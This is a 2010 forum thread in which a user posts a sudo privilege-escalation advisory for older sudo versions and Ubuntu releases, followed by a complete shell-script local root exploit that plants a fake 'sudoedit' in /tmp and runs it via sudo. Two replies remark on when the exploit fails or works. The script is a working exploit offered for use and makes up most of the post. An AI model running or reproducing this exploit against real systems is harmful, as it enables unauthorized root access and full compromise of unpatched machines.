pyth0n3 Posted March 3, 2010 Report Posted March 3, 2010 (edited) Severity: HIGHTo see if your sudo is vulnerable typesudo -VThe utility is prone to a local privilege-escalation vulnerability because it fails to correctly validate certain nondefault rules in the 'sudoer' configuration file. This issue occurs in the 'sudo/parse.c' source file. Users in supplementary groups may gain 'root' user privileges.Local attackers could exploit this issue to run arbitrary commands as the 'root' user. Successful exploits can completely compromise an affected computer.Affected ProductsUbuntu 6.06 LTSUbuntu 8.04 LTSUbuntu 8.10Ubuntu 9.04Ubuntu 9.10And also other Linux distribution that use Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4---snip---#!/bin/sh# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4# local root exploit# March 2010# automated by kingcope# Full Credits to Slouchingecho Tod Miller Sudo local root exploitecho by Slouchingecho automated by kingcopeif [ $# != 1 ]thenecho "usage: ./sudoxpl.sh <file you have permission to edit>"exitficd /tmpcat > sudoedit << _EOF#!/bin/shecho ALEX-ALEXsu/bin/su/usr/bin/su_EOFchmod a+x ./sudoeditsudo ./sudoedit $1--snip---cheers,kingcope Edited March 3, 2010 by pyth0n3 1 Quote
mosulica Posted March 8, 2010 Report Posted March 8, 2010 User xxx is not in sudo users list, incident will be reported.V 1.7.1 Quote
anixus Posted March 9, 2010 Report Posted March 9, 2010 mosulica functioneaza doar daca esti adaugat in /etc/sudoers cu drept de editare la un anumit fisier deci in concluzie exploit sux a lot Quote